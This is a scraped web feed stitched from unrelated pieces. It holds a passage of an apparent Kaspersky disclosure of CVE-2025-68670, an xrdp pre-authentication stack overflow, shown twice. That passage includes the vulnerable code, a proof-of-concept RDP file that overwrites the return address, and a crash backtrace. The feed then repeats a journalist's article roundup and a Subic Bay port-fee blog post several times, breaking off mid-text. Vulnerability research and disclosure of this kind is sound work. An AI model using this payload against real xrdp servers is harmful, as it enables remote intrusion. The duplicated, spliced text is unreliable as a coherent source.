/ * pos limit the String to only contain the IP */
g_strncpy(resultBuffer, &originalDomainInfo[1], pos); //
[10] }
else
{
LOG(LOG_LEVEL_DEBUG, "domain does not contain _");
g_strncpy(resultBuffer, &originalDomainInfo[1], 255);
}
}
return ret;
}
As seen in the code, if the first character of the domain name is an underscore (line [8]), a portion of the domain name – starting from the second character and ending with the double underscore (“__”) – is written into the resultIP buffer (line [9]). Since the domain name can be up to 512 bytes long, it may not fit into the buffer even if it’s technically well-formed (line [10]). Consequently, the overflow data will be written to the thread stack, potentially modifying the return address. If an attacker crafts a domain name that overflows the stack buffer and replaces the return address with a value they control, execution flow will shift according to the attacker’s intent upon returning from the vulnerable function, allowing for arbitrary code execution within the context of the compromised process (in this case, the xrdp server).To exploit this vulnerability, the attacker simply needs to specify a domain name that, after being converted to UTF-8, contains more than 256 bytes between the initial “_” and the subsequent “__”. Given that the conversion follows specific rules easily found online, this is a straightforward task: one can simply take advantage of the fact that the length of the same string can vary between UTF-16 and UTF-8. In short, this involves avoiding ASCII and certain other characters that may take up more space in UTF-16 than in UTF-8, while also being careful not to abuse characters that expand significantly after conversion. If the resulting UTF-8 domain name exceeds the 512-byte limit, a conversion error will occur.
PoC
As a PoC for the discovered vulnerability, we created the following RDP file containing the RDP server’s IP address and a long domain name designed to trigger a buffer overflow. In the domain name, we used a specific number of K (U+041A) characters to overwrite the return address with the string “AAAAAAAA”. The contents of the RDP file are shown below:
alternate full address:s:172.22.118.7
full address:s:172.22.118.7
domain:s:_veryveryveryverKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKeryveryveryveryveryveryveryveryveryveryveryveryveryveryveryveryveryveryveryveaaaaaaaaryveryveryveryveryveryveryveryveryveryveryveryverylongdoAAAAAAAA__0
username:s:testuser
When you open this file, the mstsc.exe process connects to the specified server. The server processes the data in the file and attempts to write the domain name into the buffer, which results in a buffer overflow and the overwriting of the return address. If you look at the xrdp memory dump at the time of the crash, you can see that both the buffer and the return address have been overwritten. The application terminates during the stack canary check. The example below was captured using the gdb debugger.
gef➤ bt
#0 __pthread_kill_implementation (no_tid=0x0, signo=0x6, threadid=0x7adb2dc71740) at ./nptl/pthread_kill.c:44
#1 __pthread_kill_internal (signo=0x6, threadid=0x7adb2dc71740) at ./nptl/pthread_kill.c:78
#2 __GI___pthread_kill (threadid=0x7adb2dc71740, signo=signo@entry=0x6) at./nptl/pthread_kill.c:89
#3 0x00007adb2da42476 in __GI_raise (sig=sig@entry=0x6) at ../sysdeps/posix/raise.c:26
#4 0x00007adb2da287f3 in __GI_abort () at ./stdlib/abort.c:79
#5 0x00007adb2da89677 in __libc_message (action=action@entry=do_abort, fmt=fmt@entry=0x7adb2dbdb92e "*** %s ***: terminated\n") at ../sysdeps/posix/libc_fatal.c:156
#6 0x00007adb2db3660a in __GI___fortify_fail (msg=msg@entry=0x7adb2dbdb916 "stack smashing detected") at ./debug/fortify_fail.c:26
#7 0x00007adb2db365d6 in __stack_chk_fail () at ./debug/stack_chk_fail.c:24
#8 0x000063654a2e5ad5 in ?? ()
#9 0x4141414141414141 in ?? ()
#10 0x00007adb00000a00 in ?? ()
#11 0x0000000000050004 in ?? ()
#12 0x00007fff91732220 in ?? ()
#13 0x000000000000030a in ?? ()
#14 0xfffffffffffffff8 in ?? ()
#15 0x000000052dc71740 in ?? ()
#16 0x3030305f70647278 in ?? ()
#17 0x616d5f6130333030 in ?? ()
#18 0x00636e79735f6e69 in ?? ()
#19 0x0000000000000000 in ?? ()Protection against vulnerability exploitation
It is worth noting that the vulnerable function can be protected by a stack canary via compiler settings. In most compilers, this option is enabled by default, which prevents an attacker from simply overwriting the return address and executing a ROP chain. To successfully exploit the vulnerability, the attacker would first need to obtain the canary value.The vulnerable function is also referenced by the xrdp_wm_show_edits function; however, even in that case, if the code is compiled with secure settings (using stack canaries), the most trivial exploitation scenario remains unfeasible.
Nevertheless, a stack canary is not a panacea. An attacker could potentially leak or guess its value, allowing them to overwrite the buffer and the return address while leaving the canary itself unchanged. In the security bulletin dedicated to CVE-2025-68670, the xrdp maintainers advise against relying solely on stack canaries when using the project.
Vulnerability remediation timeline
- 12/05/2025: we submitted the vulnerability report via github.com/neutrinolabs/xrdp/s…
- 12/05/2025: the project maintainers immediately confirmed receipt of the report and stated they would review it shortly.
- 12/15/2025: investigation and prioritization of the vulnerability began.
- 12/18/2025: the maintainers confirmed the vulnerability and began developing a patch.
- 12/24/2025: the vulnerability was assigned the identifier CVE-2025-68670.
- 01/27/2026: the patch was merged into the project’s main branch.
Conclusion
Taking a responsible approach to code makes not only our own products more solid but also enhances popular open-source projects. We have previously shared how security assessments of KasperskyOS-based solutions – such as Kaspersky Thin Client and Kaspersky IoT Secure Gateway – led to the discovery of several vulnerabilities in Suricata and FreeRDP, which project maintainers quickly patched. CVE-2025-68670 is yet another one of those stories.However, discovering a vulnerability is only half the battle. We would like to thank the xrdp maintainers for their rapid response to our report, for fixing the vulnerability, and for issuing a security bulletin detailing the issue and risk mitigation options.
-
CVE-2025-68670: discovering an RCE vulnerability in xrdp
In addition to KasperskyOS-powered solutions, Kaspersky offers various utility software to streamline business operations. For instance, users of Kaspersky Thin Client, an operating system for thin clients, can also purchase Kaspersky USB Redirector, a module that expands the capabilities of the xrdp remote desktop server for Linux. This module enables access to local USB devices, such as flash drives, tokens, smart cards, and printers, within a remote desktop session – all while maintaining connection security.
We take the security of our products seriously and regularly conduct security assessments. Kaspersky USB Redirector is no exception. Last year, during a security audit of this tool, we discovered a remote code execution vulnerability in the xrdp server, which was assigned the identifier CVE-2025-68670. We reported our findings to the project maintainers, who responded quickly: they fixed the vulnerability in version 0.10.5, backported the patch to versions 0.9.27 and 0.10.4.1, and issued a security bulletin. This post breaks down the details of CVE-2025-68670 and provides recommendations for staying protected.
Client data transmission via RDP
Establishing an RDP connection is a complex, multi-stage process where the client and server exchange various settings. In the context of the vulnerability we discovered, we are specifically interested in the Secure Settings Exchange, which occurs immediately before client authentication. At this stage, the client sends protected credentials to the server within a Client Info PDU (protocol data unit with client info): username, password, auto-reconnect cookies, and so on. These data points are bundled into a TS_INFO_PACKET structure and can be represented as Unicode strings up to 512 bytes long, the last of which must be a null terminator. In the xrdp code, this corresponds to the xrdp_client_info structure, which looks as follows:
{
[..SNIP..]
char username[INFO_CLIENT_MAX_CB_LEN];
char password[INFO_CLIENT_MAX_CB_LEN];
char domain[INFO_CLIENT_MAX_CB_LEN];
char program[INFO_CLIENT_MAX_CB_LEN];
char directory[INFO_CLIENT_MAX_CB_LEN];
[..SNIP..]
}
The value of the INFO_CLIENT_MAX_CB_LEN constant corresponds to the maximum string length and is defined as follows:
#define INFO_CLIENT_MAX_CB_LEN 512
When transmitting Unicode data, the client uses the UTF-16 encoding. However, the server converts the data to UTF-8 before saving it.
if (ts_info_utf16_in( //
[1] s, len_domain, self->rdp_layer->client_info.domain, sizeof(self->rdp_layer->client_info.domain)) != 0) //
[2]{
[..SNIP..]
}
The size of the buffer for unpacking the domain name in UTF-8 [2] is passed to the ts_info_utf16_in function [1], which implements buffer overflow protection [3].
static int ts_info_utf16_in(struct stream *s, int src_bytes, char *dst, int dst_len)
{
int rv = 0;
LOG_DEVEL(LOG_LEVEL_TRACE, "ts_info_utf16_in: uni_len %d, dst_len %d", src_bytes, dst_len);
if (!s_check_rem_and_log(s, src_bytes + 2, "ts_info_utf16_in"))
{
rv = 1;
}
else
{
int term;
int num_chars = in_utf16_le_fixed_as_utf8(s, src_bytes / 2,
dst, dst_len);
if (num_chars > dst_len) //
[3] {
LOG(LOG_LEVEL_ERROR, "ts_info_utf16_in: output buffer overflow"); rv = 1;
}
/ / String should be null-terminated. We haven't read the terminator yet
in_uint16_le(s, term);
if (term != 0)
{
LOG(LOG_LEVEL_ERROR, "ts_info_utf16_in: bad terminator. Expected 0, got %d", term);
rv = 1;
}
}
return rv;
}
Next, the in_utf16_le_fixed_as_utf8_proc function, where the actual data conversion from UTF-16 to UTF-8 takes place, checks the number of bytes written [4] as well as whether the string is null-terminated [5].
{
unsigned int rv = 0;
char32_t c32;
char u8str[MAXLEN_UTF8_CHAR];
unsigned int u8len;
char *saved_s_end = s->end;// Expansion of S_CHECK_REM(s, n*2) using passed-in file and line #ifdef USE_DEVEL_STREAMCHECK
parser_stream_overflow_check(s, n * 2, 0, file, line); #endif
// Temporarily set the stream end pointer to allow us to use
// s_check_rem() when reading in UTF-16 words
if (s->end - s->p > (int)(n * 2))
{
s->end = s->p + (int)(n * 2);
}while (s_check_rem(s, 2))
{
c32 = get_c32_from_stream(s);
u8len = utf_char32_to_utf8(c32, u8str);
if (u8len + 1 <= vn) //
[4] {
/* Room for this character and a terminator. Add the character */
unsigned int i;
for (i = 0 ; i < u8len ; ++i)
{
v[i] = u8str[i];
}v n -= u8len;
v += u8len;
}else if (vn > 1)
{
/* We've skipped a character, but there's more than one byte
* remaining in the output buffer. Mark the output buffer as
* full so we don't get a smaller character being squeezed into
* the remaining space */
vn = 1;
}r v += u8len;
}
// Restore stream to full length s->end = saved_s_end;
if (vn > 0)
{
*v = '\0'; //
[5] }
+ +rv;
return rv;
}
Consequently, up to 512 bytes of input data in UTF-16 are converted into UTF-8 data, which can also reach a size of up to 512 bytes.CVE-2025-68670: an RCE vulnerability in xrdp
The vulnerability exists within the xrdp_wm_parse_domain_information function, which processes the domain name saved on the server in UTF-8. Like the functions described above, this one is called before client authentication, meaning exploitation does not require valid credentials. The call stack below illustrates this.
x rdp_wm_parse_domain_information(char *originalDomainInfo, int comboMax,
int decode, char *resultBuffer)
xrdp_login_wnd_create(struct xrdp_wm *self)
xrdp_wm_init(struct xrdp_wm *self)
xrdp_wm_login_state_changed(struct xrdp_wm *self)
xrdp_wm_check_wait_objs(struct xrdp_wm *self)
xrdp_process_main_loop(struct xrdp_process *self)
The code snippet where the vulnerable function is called looks like this:
char resultIP[256]; //
[7][..SNIP..]
combo->item_index = xrdp_wm_parse_domain_information(
self->session->client_info->domain, //
[6] combo->data_list->count, 1,
resultIP /* just a dummy place holder, we ignore
*/ );
As you can see, the first argument of the function in line [6] is the domain name up to 512 bytes long. The final argument is the resultIP buffer of 256 bytes (as seen in line [7]). Now, let’s look at exactly what the vulnerable function does with these arguments.
static int
xrdp_wm_parse_domain_information(char *originalDomainInfo, int comboMax,
int decode, char *resultBuffer)
{
int ret;
int pos;
int comboxindex;
char index[2];/* If the first char in the domain name is '_' we use the domain name as IP*/
ret = 0; /* default return value */
/* resultBuffer assumed to be 256 chars */
g_memset(resultBuffer, 0, 256);
if (originalDomainInfo[0] == '_') //
[8] {
/* we try to locate a number indicating what combobox index the user
* prefer the information is loaded from domain field, from the client
* We must use valid chars in the domain name.
* Underscore is a valid name in the domain.
* Invalid chars are ignored in microsoft client therefore we use '_'
* again. this sec '__' contains the split for index.*/
pos = g_pos(&originalDomainInfo[1], "__"); //
[9] if (pos > 0)
{
/* an index is found we try to use it */
LOG(LOG_LEVEL_DEBUG, "domain contains index char __");
if (decode)
{
[..SNIP..]
}
/ * pos limit the String to only contain the IP */
g_strncpy(resultBuffer, &originalDomainInfo[1], pos); //
[10] }
else
{
LOG(LOG_LEVEL_DEBUG, "domain does not contain _");
g_strncpy(resultBuffer, &originalDomainInfo[1], 255);
}
}
return ret;
}
As seen in the code, if the first character of the domain name is an underscore (line [8]), a portion of the domain name – starting from the second character and ending with the double underscore (“__”) – is written into the resultIP buffer (line [9]). Since the domain name can be up to 512 bytes long, it may not fit into the buffer even if it’s technically well-formed (line [10]). Consequently, the overflow data will be written to the thread stack, potentially modifying the return address. If an attacker crafts a domain name that overflows the stack buffer and replaces the return address with a value they control, execution flow will shift according to the attacker’s intent upon returning from the vulnerable function, allowing for arbitrary code execution within the context of the compromised process (in this case, the xrdp server).To exploit this vulnerability, the attacker simply needs to specify a domain name that, after being converted to UTF-8, contains more than 256 bytes between the initial “_” and the subsequent “__”. Given that the conversion follows specific rules easily found online, this is a straightforward task: one can simply take advantage of the fact that the length of the same string can vary between UTF-16 and UTF-8. In short, this involves avoiding ASCII and certain other characters that may take up more space in UTF-16 than in UTF-8, while also being careful not to abuse characters that expand significantly after conversion. If the resulting UTF-8 domain name exceeds the 512-byte limit, a conversion error will occur.
PoC
As a PoC for the discovered vulnerability, we created the following RDP file containing the RDP server’s IP address and a long domain name designed to trigger a buffer overflow. In the domain name, we used a specific number of K (U+041A) characters to overwrite the return address with the string “AAAAAAAA”. The contents of the RDP file are shown below:
alternate full address:s:172.22.118.7
full address:s:172.22.118.7
domain:s:_veryveryveryverKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKeryveryveryveryveryveryveryveryveryveryveryveryveryveryveryveryveryveryveryveaaaaaaaaryveryveryveryveryveryveryveryveryveryveryveryverylongdoAAAAAAAA__0
username:s:testuser
When you open this file, the mstsc.exe process connects to the specified server. The server processes the data in the file and attempts to write the domain name into the buffer, which results in a buffer overflow and the overwriting of the return address. If you look at the xrdp memory dump at the time of the crash, you can see that both the buffer and the return address have been overwritten. The application terminates during the stack canary check. The example below was captured using the gdb debugger.
gef➤ bt
#0 __pthread_kill_implementation (no_tid=0x0, signo=0x6, threadid=0x7adb2dc71740) at ./nptl/pthread_kill.c:44
#1 __pthread_kill_internal (signo=0x6, threadid=0x7adb2dc71740) at ./nptl/pthread_kill.c:78
#2 __GI___pthread_kill (threadid=0x7adb2dc71740, signo=signo@entry=0x6) at./nptl/pthread_kill.c:89
#3 0x00007adb2da42476 in __GI_raise (sig=sig@entry=0x6) at ../sysdeps/posix/raise.c:26
#4 0x00007adb2da287f3 in __GI_abort () at ./stdlib/abort.c:79
#5 0x00007adb2da89677 in __libc_message (action=action@entry=do_abort, fmt=fmt@entry=0x7adb2dbdb92e "*** %s ***: terminated\n") at ../sysdeps/posix/libc_fatal.c:156
#6 0x00007adb2db3660a in __GI___fortify_fail (msg=msg@entry=0x7adb2dbdb916 "stack smashing detected") at ./debug/fortify_fail.c:26
#7 0x00007adb2db365d6 in __stack_chk_fail () at ./debug/stack_chk_fail.c:24
#8 0x000063654a2e5ad5 in ?? ()
#9 0x4141414141414141 in ?? ()
#10 0x00007adb00000a00 in ?? ()
#11 0x0000000000050004 in ?? ()
#12 0x00007fff91732220 in ?? ()
#13 0x000000000000030a in ?? ()
#14 0xfffffffffffffff8 in ?? ()
#15 0x000000052dc71740 in ?? ()
#16 0x3030305f70647278 in ?? ()
#17 0x616d5f6130333030 in ?? ()
#18 0x00636e79735f6e69 in ?? ()
#19 0x0000000000000000 in ?? ()Protection against vulnerability exploitation
It is worth noting that the vulnerable function can be protected by a stack canary via compiler settings. In most compilers, this option is enabled by default, which prevents an attacker from simply overwriting the return address and executing a ROP chain. To successfully exploit the vulnerability, the attacker would first need to obtain the canary value.The vulnerable function is also referenced by the xrdp_wm_show_edits function; however, even in that case, if the code is compiled with secure settings (using stack canaries), the most trivial exploitation scenario remains unfeasible.
Nevertheless, a stack canary is not a panacea. An attacker could potentially leak or guess its value, allowing them to overwrite the buffer and the return address while leaving the canary itself unchanged. In the security bulletin dedicated to CVE-2025-68670, the xrdp maintainers advise against relying solely on stack canaries when using the project.
Vulnerability remediation timeline
- 12/05/2025: we submitted the vulnerability report via github.com/neutrinolabs/xrdp/s…
- 12/05/2025: the project maintainers immediately confirmed receipt of the report and stated they would review it shortly.
- 12/15/2025: investigation and prioritization of the vulnerability began.
- 12/18/2025: the maintainers confirmed the vulnerability and began developing a patch.
- 12/24/2025: the vulnerability was assigned the identifier CVE-2025-68670.
- 01/27/2026: the patch was merged into the project’s main branch.
Conclusion
Taking a responsible approach to code makes not only our own products more solid but also enhances popular open-source projects. We have previously shared how security assessments of KasperskyOS-based solutions – such as Kaspersky Thin Client and Kaspersky IoT Secure Gateway – led to the discovery of several vulnerabilities in Suricata and FreeRDP, which project maintainers quickly patched. CVE-2025-68670 is yet another one of those stories.However, discovering a vulnerability is only half the battle. We would like to thank the xrdp maintainers for their rapid response to our report, for fixing the vulnerability, and for issuing a security bulletin detailing the issue and risk mitigation options.
-
This workweek felt longer than usual because Thursday had me going to Dallas and back for an upcoming story. As booked, this itinerary would have put about 17 hours between my stepping off my front porch in the morning and returning to my house late at night, but as flown it returned me home three hours later than planned, almost 21 hours after I’d woken up. Patreon readers, I hope you will enjoy my upcoming recap of that prolonged day.
7/22/2024: Why the Tech Industry Refuses to Learn From Disastrous Outages, The New Republic
A friend filling in at TNR–the same one who helped me get my first byline at that publication last July–asked if I could turn around a post about lessons from the CrowdStrike calamity. I said I could, received an editorial green light for my pitch at 11:37 a.m., got useful quotes from three of six subject-matter experts I’d hit up for comment, and filed the piece at 5 p.m. sharp.
7/23/2024: TikTok, YouTube Battle for Satisfaction Supremacy, Facebook Hate Calms a Bit, PCMag
In my latest coverage of the American Customer Satisfaction Index’s ratings of social-media and search-engine firms, I called out the contradiction between search operators having such closely-spaced satisfaction rankings and Google’s overwhelming dominance of the market.
7/23/2024: Sydney Sweeney’s X Account Reportedly Hijacked Via (Yet Another) SIM Swap, PCMag
The celebrity angle didn’t make me want to cover the account takeover that 404 Media’s Joseph Cox reported, but seeing a telecom carrier once again apparently fall prey to a SIM-swap attack made me want to remind readers that this risk is not going away. And that they should not depend on text-message-based two-factor authentication for the most important accounts in their lives.
7/24/2024: Buttigieg Plays the Long Game on EVs, But He’s Not Sold on the Cybertruck, PCMag
I didn’t have Tuesday night’s Axios event featuring Secretary Pete on my calendar until Monday, when an e-mail from that publication listed it among other upcoming events. I was pleasantly surprised to see that it hadn’t hit capacity by the time I signed up.
7/26/2024: Senators: Your Driving Data May Have Been Sold For as Little as 26 Cents, PCMag
Two days later, I returned to the topic of cars to cover how Sens. Ed Markey (D.-Mass.) and Ron Wyden (D.-Ore.) documented how readily and how cheaply some car manufacturers will sell off driving-behavior data to data brokers.
#ACSI #connectedCarPrivacy #connectedCars #CrowdStrike #electricCars #EVs #ITMonoculture #PeteButtigieg #searchEngines #SIMSwap #socialMediaSatisfaction #SydneySweeney #TNR #XAccountTakeover
-
This workweek felt longer than usual because Thursday had me going to Dallas and back for an upcoming story. As booked, this itinerary would have put about 17 hours between my stepping off my front porch in the morning and returning to my house late at night, but as flown it returned me home three hours later than planned, almost 21 hours after I’d woken up. Patreon readers, I hope you will enjoy my upcoming recap of that prolonged day.
7/22/2024: Why the Tech Industry Refuses to Learn From Disastrous Outages, The New Republic
A friend filling in at TNR–the same one who helped me get my first byline at that publication last July–asked if I could turn around a post about lessons from the CrowdStrike calamity. I said I could, received an editorial green light for my pitch at 11:37 a.m., got useful quotes from three of six subject-matter experts I’d hit up for comment, and filed the piece at 5 p.m. sharp.
7/23/2024: TikTok, YouTube Battle for Satisfaction Supremacy, Facebook Hate Calms a Bit, PCMag
In my latest coverage of the American Customer Satisfaction Index’s ratings of social-media and search-engine firms, I called out the contradiction between search operators having such closely-spaced satisfaction rankings and Google’s overwhelming dominance of the market.
7/23/2024: Sydney Sweeney’s X Account Reportedly Hijacked Via (Yet Another) SIM Swap, PCMag
The celebrity angle didn’t make me want to cover the account takeover that 404 Media’s Joseph Cox reported, but seeing a telecom carrier once again apparently fall prey to a SIM-swap attack made me want to remind readers that this risk is not going away. And that they should not depend on text-message-based two-factor authentication for the most important accounts in their lives.
7/24/2024: Buttigieg Plays the Long Game on EVs, But He’s Not Sold on the Cybertruck, PCMag
I didn’t have Tuesday night’s Axios event featuring Secretary Pete on my calendar until Monday, when an e-mail from that publication listed it among other upcoming events. I was pleasantly surprised to see that it hadn’t hit capacity by the time I signed up.
7/26/2024: Senators: Your Driving Data May Have Been Sold For as Little as 26 Cents, PCMag
Two days later, I returned to the topic of cars to cover how Sens. Ed Markey (D.-Mass.) and Ron Wyden (D.-Ore.) documented how readily and how cheaply some car manufacturers will sell off driving-behavior data to data brokers.
#ACSI #connectedCarPrivacy #connectedCars #CrowdStrike #electricCars #EVs #ITMonoculture #PeteButtigieg #searchEngines #SIMSwap #socialMediaSatisfaction #SydneySweeney #TNR #XAccountTakeover
-
This workweek felt longer than usual because Thursday had me going to Dallas and back for an upcoming story. As booked, this itinerary would have put about 17 hours between my stepping off my front porch in the morning and returning to my house late at night, but as flown it returned me home three hours later than planned, almost 21 hours after I’d woken up. Patreon readers, I hope you will enjoy my upcoming recap of that prolonged day.
7/22/2024: Why the Tech Industry Refuses to Learn From Disastrous Outages, The New Republic
A friend filling in at TNR–the same one who helped me get my first byline at that publication last July–asked if I could turn around a post about lessons from the CrowdStrike calamity. I said I could, received an editorial green light for my pitch at 11:37 a.m., got useful quotes from three of six subject-matter experts I’d hit up for comment, and filed the piece at 5 p.m. sharp.
7/23/2024: TikTok, YouTube Battle for Satisfaction Supremacy, Facebook Hate Calms a Bit, PCMag
In my latest coverage of the American Customer Satisfaction Index’s ratings of social-media and search-engine firms, I called out the contradiction between search operators having such closely-spaced satisfaction rankings and Google’s overwhelming dominance of the market.
7/23/2024: Sydney Sweeney’s X Account Reportedly Hijacked Via (Yet Another) SIM Swap, PCMag
The celebrity angle didn’t make me want to cover the account takeover that 404 Media’s Joseph Cox reported, but seeing a telecom carrier once again apparently fall prey to a SIM-swap attack made me want to remind readers that this risk is not going away. And that they should not depend on text-message-based two-factor authentication for the most important accounts in their lives.
7/24/2024: Buttigieg Plays the Long Game on EVs, But He’s Not Sold on the Cybertruck, PCMag
I didn’t have Tuesday night’s Axios event featuring Secretary Pete on my calendar until Monday, when an e-mail from that publication listed it among other upcoming events. I was pleasantly surprised to see that it hadn’t hit capacity by the time I signed up.
7/26/2024: Senators: Your Driving Data May Have Been Sold For as Little as 26 Cents, PCMag
Two days later, I returned to the topic of cars to cover how Sens. Ed Markey (D.-Mass.) and Ron Wyden (D.-Ore.) documented how readily and how cheaply some car manufacturers will sell off driving-behavior data to data brokers.
#ACSI #connectedCarPrivacy #connectedCars #CrowdStrike #electricCars #EVs #ITMonoculture #PeteButtigieg #searchEngines #SIMSwap #socialMediaSatisfaction #SydneySweeney #TNR #XAccountTakeover
-
Temporary Reduced Fees And Support For Port Clients Confirmed By SBMA
In response to the spiked fuel prices and other economic uncertainties, the Subic Bay Metropolitan Authority (SBMA) announced that it will temporarily offer reduced fees and provide financial support to its port clients.
To put things in perspective, posted below is an excerpt from official announcement by the SBMA. Some parts in boldface…
The Subic Bay Metropolitan Authority (SBMA) has temporarily taken measures to provide port clients with the much-needed financial support, amid the ongoing rise in fuel costs in the global market.
SBMA Chairman and Administrator Eduardo Jose L. Aliño explained that this is in line with President Ferdinand R. Marcos Jr.’s Executive Order No. 110, which immediately placed the entire country in a state of national energy emergency due to geopolitical tensions in the Middle East.
Aliño added that such temporary measures aim to provide aid to industries affected by the Middle East crisis by ensuring that cost-stabilizing strategies for the transport and food sectors are implemented without delay.
“These initiatives, including reduced fees and extended free storage, provide a fiscal cushion to reinforce investor confidence and prevent supply chain bottlenecks,” said Aliño.
He also cited that key industry participants namely, importers, suppliers, consignees, vessel owners, and consumers, will experience the impact of these measures through their respective counterparts – terminal operators, cargo handlers, brokers, consolidators, processors, ship agents, and shipping lines, resulting in a cascading effect throughout the supply chain.
As part of this initiative, the SBMA will implement a five percent tariff reduction on all commercial vessels, including harbor fees, berthing fees/ anchorage fees, and harbor cleaning fees, as well as a five percent tariff reduction on cargo charges including wharfage fees, and storage fees.
“We will also implement a five percent tariff reduction on SBMA shares such as pilotage fee, hauling services, tugboat services, heavy equipment rental, line handling services, chandling services, water tendering, cargo handling for containerized cargo, and bunkering services,” he added.
Additionally, the SBMA is also offering free storage for non-containerized cargo, and free storage period for an additional 2-day extension.To further aid port clients, the SBMA will temporarily suspend the collection of shares from terminal operators/cargo handlers for liquid bulk cargo handling and related activities; the implementation of the one percent admission fee for liquid bulk; and the implementation of the ten percent increase on cargo handling and miscellaneous charges of non-containerized/ general cargoes.
Chairman Aliño assured port stakeholders that these measures shall take effect immediately upon its approval and ratification by the SBMA Board of Directors, adding that these will remain in force until geopolitical tensions subside, at which point they shall be lifted via a formal issuance following Board approval.
Let me end this post by asking you readers: What is your reaction to this recent development? Do you think this new move by the SBMA will be sufficient enough for the port clients and keep economic activity in the freeport growing? Do you think the SBMA will have to further intensify its tourism activities to attract more high-spending tourists to bounce back from a potential economic downturn?
You may answer in the comments below. If you prefer to answer privately, you may do so by sending me a direct message online.
+++++
Thank you for reading. If you find this article engaging, please click the like button below, share this article to others and also please consider making a donation to support my publishing. If you are looking for a copywriter to create content for your special project or business, check out my services and my portfolio. Feel free to contact me with a private message. Also please feel free to visit my Facebook page Author Carlo Carrasco and follow me on Twitter at @CarloCarrascoPH as well as on Tumblr at https://carlocarrasco.tumblr.com/ and on Instagram athttps://www.instagram.com/authorcarlocarrasco
#ASEAN #Asia #AssociationOfSoutheastAsianNationsASEAN #Bing #Blog #blogger #blogging #BongbongMarcos #business #businessNews #CarloCarrasco #ChatGPT #economicDynamism #economicGrowth #economics #economy #EconomyOfSubicBay #EconomyOfThePhilippines #EduardoJoseLAliño #energy #Facebook #foreignInvestment #foreignInvestors #foreignTourists #fuel #geek #Google #GoogleSearch #governance #holiday #Instagram #Investagrams #investment #investors #localTourists #Marcos #news #oil #Philippines #PhilippinesBlog #Pinoy #portOperations #PresidentMarcos #publicService #SBMA #socialMedia #SoutheastAsia #SubicBay #SubicBayFreeportZone #SubicBayMetropolitanAuthoritySBMA #technology #tourism #tourismBlog #tourists #travel #travelBlog #Tumblr #Twitter #WordPress #WordPressCom -
Temporary Reduced Fees And Support For Port Clients Confirmed By SBMA
In response to the spiked fuel prices and other economic uncertainties, the Subic Bay Metropolitan Authority (SBMA) announced that it will temporarily offer reduced fees and provide financial support to its port clients.
To put things in perspective, posted below is an excerpt from official announcement by the SBMA. Some parts in boldface…
The Subic Bay Metropolitan Authority (SBMA) has temporarily taken measures to provide port clients with the much-needed financial support, amid the ongoing rise in fuel costs in the global market.
SBMA Chairman and Administrator Eduardo Jose L. Aliño explained that this is in line with President Ferdinand R. Marcos Jr.’s Executive Order No. 110, which immediately placed the entire country in a state of national energy emergency due to geopolitical tensions in the Middle East.
Aliño added that such temporary measures aim to provide aid to industries affected by the Middle East crisis by ensuring that cost-stabilizing strategies for the transport and food sectors are implemented without delay.
“These initiatives, including reduced fees and extended free storage, provide a fiscal cushion to reinforce investor confidence and prevent supply chain bottlenecks,” said Aliño.
He also cited that key industry participants namely, importers, suppliers, consignees, vessel owners, and consumers, will experience the impact of these measures through their respective counterparts – terminal operators, cargo handlers, brokers, consolidators, processors, ship agents, and shipping lines, resulting in a cascading effect throughout the supply chain.
As part of this initiative, the SBMA will implement a five percent tariff reduction on all commercial vessels, including harbor fees, berthing fees/ anchorage fees, and harbor cleaning fees, as well as a five percent tariff reduction on cargo charges including wharfage fees, and storage fees.
“We will also implement a five percent tariff reduction on SBMA shares such as pilotage fee, hauling services, tugboat services, heavy equipment rental, line handling services, chandling services, water tendering, cargo handling for containerized cargo, and bunkering services,” he added.
Additionally, the SBMA is also offering free storage for non-containerized cargo, and free storage period for an additional 2-day extension.To further aid port clients, the SBMA will temporarily suspend the collection of shares from terminal operators/cargo handlers for liquid bulk cargo handling and related activities; the implementation of the one percent admission fee for liquid bulk; and the implementation of the ten percent increase on cargo handling and miscellaneous charges of non-containerized/ general cargoes.
Chairman Aliño assured port stakeholders that these measures shall take effect immediately upon its approval and ratification by the SBMA Board of Directors, adding that these will remain in force until geopolitical tensions subside, at which point they shall be lifted via a formal issuance following Board approval.
Let me end this post by asking you readers: What is your reaction to this recent development? Do you think this new move by the SBMA will be sufficient enough for the port clients and keep economic activity in the freeport growing? Do you think the SBMA will have to further intensify its tourism activities to attract more high-spending tourists to bounce back from a potential economic downturn?
You may answer in the comments below. If you prefer to answer privately, you may do so by sending me a direct message online.
+++++
Thank you for reading. If you find this article engaging, please click the like button below, share this article to others and also please consider making a donation to support my publishing. If you are looking for a copywriter to create content for your special project or business, check out my services and my portfolio. Feel free to contact me with a private message. Also please feel free to visit my Facebook page Author Carlo Carrasco and follow me on Twitter at @CarloCarrascoPH as well as on Tumblr at https://carlocarrasco.tumblr.com/ and on Instagram athttps://www.instagram.com/authorcarlocarrasco
#ASEAN #Asia #AssociationOfSoutheastAsianNationsASEAN #Bing #Blog #blogger #blogging #BongbongMarcos #business #businessNews #CarloCarrasco #ChatGPT #economicDynamism #economicGrowth #economics #economy #EconomyOfSubicBay #EconomyOfThePhilippines #EduardoJoseLAliño #energy #Facebook #foreignInvestment #foreignInvestors #foreignTourists #fuel #geek #Google #GoogleSearch #governance #holiday #Instagram #Investagrams #investment #investors #localTourists #Marcos #news #oil #Philippines #PhilippinesBlog #Pinoy #portOperations #PresidentMarcos #publicService #SBMA #socialMedia #SoutheastAsia #SubicBay #SubicBayFreeportZone #SubicBayMetropolitanAuthoritySBMA #technology #tourism #tourismBlog #tourists #travel #travelBlog #Tumblr #Twitter #WordPress #WordPressCom -
Temporary Reduced Fees And Support For Port Clients Confirmed By SBMA
In response to the spiked fuel prices and other economic uncertainties, the Subic Bay Metropolitan Authority (SBMA) announced that it will temporarily offer reduced fees and provide financial support to its port clients.
To put things in perspective, posted below is an excerpt from official announcement by the SBMA. Some parts in boldface…
The Subic Bay Metropolitan Authority (SBMA) has temporarily taken measures to provide port clients with the much-needed financial support, amid the ongoing rise in fuel costs in the global market.
SBMA Chairman and Administrator Eduardo Jose L. Aliño explained that this is in line with President Ferdinand R. Marcos Jr.’s Executive Order No. 110, which immediately placed the entire country in a state of national energy emergency due to geopolitical tensions in the Middle East.
